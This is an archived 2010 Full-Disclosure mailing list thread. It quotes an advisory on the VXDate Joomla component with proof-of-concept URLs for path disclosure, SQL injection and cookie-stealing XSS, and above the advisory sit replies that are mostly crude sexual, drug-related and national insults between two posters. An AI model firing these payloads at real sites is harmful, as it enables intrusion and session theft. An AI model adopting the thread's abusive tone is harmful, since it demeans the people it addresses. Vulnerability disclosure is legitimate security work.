Re: Vulnerabilities in VXDate for Joomla

[julian steward <julian.steward09 () gmail com>]

Yup, and that's pretty much how your born.

Welcome in real life cunt.

On Mon, Mar 22, 2010 at 8:53 AM, Anders Klixbull <akl () experian dk> wrote:

>  yeah sure..
> you junkies are alle the same you suck dicks for cheeseburgers and crack
>
>
>
>  ------------------------------
>  *From:* julian steward [mailto:julian.steward09 () gmail com]
> *Sent:* 22. marts 2010 13:50
> *To:* Anders Klixbull
> *Cc:* full-disclosure () lists grok org uk
>
> *Subject:* Re: [Full-disclosure] Vulnerabilities in VXDate for Joomla
>
>   Na only when i need to light up your mom"s crack bang when she's to
> fucking high.
>
> On Mon, Mar 22, 2010 at 8:42 AM, Anders Klixbull <akl () experian dk> wrote:
>
> >  why does it hurt when you suck lemons?
> > does your teeth gets fucked up when you smoke cock all day?
> >
> >
> >
> >  ------------------------------
> >  *From:* julian steward [mailto:julian.steward09 () gmail com]
> > *Sent:* 22. marts 2010 13:39
> > *To:* Anders Klixbull; full-disclosure () lists grok org uk
> >
> > *Subject:* Re: [Full-disclosure] Vulnerabilities in VXDate for Joomla
> >
> >   Yup ur fucking right, as mustdie.
> >
> > 2 cockmunch for the price of one.
> >
> > Nice.
> >
> > On Mon, Mar 22, 2010 at 8:36 AM, Anders Klixbull <akl () experian dk> wrote:
> >
> > >   lol look who's talking about being professional
> > > yeah sure because klixbull is such a russian name right?
> > > and oh yeah my email address also ends in .ua
> > > julian its time to stop gobbling that cock and shut the fuck up
> > >
> > >
> > >
> > >  ------------------------------
> > >  *From:* full-disclosure-bounces () lists grok org uk [mailto:
> > > full-disclosure-bounces () lists grok org uk] *On Behalf Of *julian steward
> > > *Sent:* 22. marts 2010 13:34
> > > *To:* full-disclosure () lists grok org uk >> fdisclo
> > >
> > > *Subject:* Re: [Full-disclosure] Vulnerabilities in VXDate for Joomla
> > >
> > >    Sucking lemon hurts, I don't see why I would suck one Mr Klixbull
> > >
> > > Regarding his disclosure, then he shall stfu about the timeline if he
> > > wanna be "professional".
> > >
> > > Yup Klixbull it's time to close your basement door and your mounth, or
> > > are you too from .ua btw ?
> > >
> > >
> > > > On Mon, Mar 22, 2010 at 7:41 AM, Anders Klixbull <akl () experian dk>wrote:
> > > >
> > > > >  bohooo stop crying
> > > > > he can disclose bugs when he feels like it
> > > > > if you dont like that then go suck a lemon
> > > > >
> > > > >
> > > > >
> > > > >  ------------------------------
> > > > > *From:* full-disclosure-bounces () lists grok org uk [mailto:
> > > > > full-disclosure-bounces () lists grok org uk] *On Behalf Of *julian
> > > > > steward
> > > > > *Sent:* 22. marts 2010 00:16
> > > > > *To:* MustLive; full-disclosure () lists grok org uk
> > > > > *Subject:* Re: [Full-disclosure] Vulnerabilities in VXDate for Joomla
> > > > >
> > > > >   7 month to inform the dev's, what kind of asshole are you ?
> > > > >
> > > > > Oh wait, were you hacking some n00bs website, with your shitty dork ?
> > > > >
> > > > > 2010/3/17 MustLive <mustlive () websecurity com ua>
> > > > >
> > > > > > Hello Full-Disclosure!
> > > > > >
> > > > > > I want to warn you about vulnerabilities in component VXDate for
> > > > > > Joomla.
> > > > > >
> > > > > > -----------------------------
> > > > > > Advisory: Vulnerabilities in VXDate for Joomla
> > > > > > -----------------------------
> > > > > > URL: http://websecurity.com.ua/3849/
> > > > > > -----------------------------
> > > > > > Timeline:
> > > > > >
> > > > > > 10.05.2009 - found the vulnerabilities.
> > > > > > 12.01.2010 - announced at my site.
> > > > > > 18.01.2010 - informed developers.
> > > > > > 13.03.2010 - disclosed at my site.
> > > > > > -----------------------------
> > > > > > Details:
> > > > > >
> > > > > > These are Full path disclosure, SQL Injection and Cross-Site Scripting
> > > > > > vulnerabilities.
> > > > > >
> > > > > > Full path disclosure:
> > > > > >
> > > > > > http://site/index.php?option=com_vxdate&ct=’
> > > > > >
> > > > > > http://site/index.php?option=com_vxdate&ct=1&md=details&id=’
> > > > > >
> > > > > > http://site/index.php?option=com_vxdate&ct=1&md=editform&id=’
> > > > > >
> > > > > > SQL Injection:
> > > > > >
> > > > > >
> > > > > > http://site/index.php?option=com_vxdate&ct=1&md=details&id=-1%20or%20version()=5
> > > > > >
> > > > > >
> > > > > > http://site/index.php?option=com_vxdate&ct=1&md=editform&id=-1%20or%20version()=5
> > > > > >
> > > > > > XSS:
> > > > > >
> > > > > >
> > > > > > http://site/index.php?option=com_vxdate&ct=1&md=details&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E
> > > > > >
> > > > > >
> > > > > > http://site/index.php?option=com_vxdate&ct=1&md=editform&id=%3Cscript%3Ealert(document.cookie)%3C/script%3E
> > > > > >
> > > > > > Vulnerable are potentially all versions of VXDate.
> > > > > >
> > > > > > Best wishes & regards,
> > > > > > MustLive
> > > > > > Administrator of Websecurity web site
> > > > > > http://websecurity.com.ua
> > > > > >
> > > > > > _______________________________________________
> > > > > > Full-Disclosure - We believe in it.
> > > > > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > > > > > Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/